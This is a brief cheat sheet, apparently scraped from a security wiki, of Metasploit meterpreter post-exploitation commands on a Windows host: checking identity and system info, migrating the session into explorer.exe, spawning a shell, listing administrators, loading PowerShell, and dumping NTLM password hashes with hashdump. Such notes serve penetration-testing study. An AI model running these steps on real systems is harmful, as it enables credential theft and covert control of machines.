Metasploit
Post Exploitation Workflow
getuid
sysinfo
ps -S explorer.exe #Get the process list with filter "explorer.exe"
migrate <pid> #Migrate the session to process
shell #Spawn a cmd.exe processCheck group members
net localgroup adminstratorsLoad Powershell Extension
meterpreter> load powershell
meterpreter> powershell_shellDump windows users NTLM hashes
meterpreter> hashdumpLast updated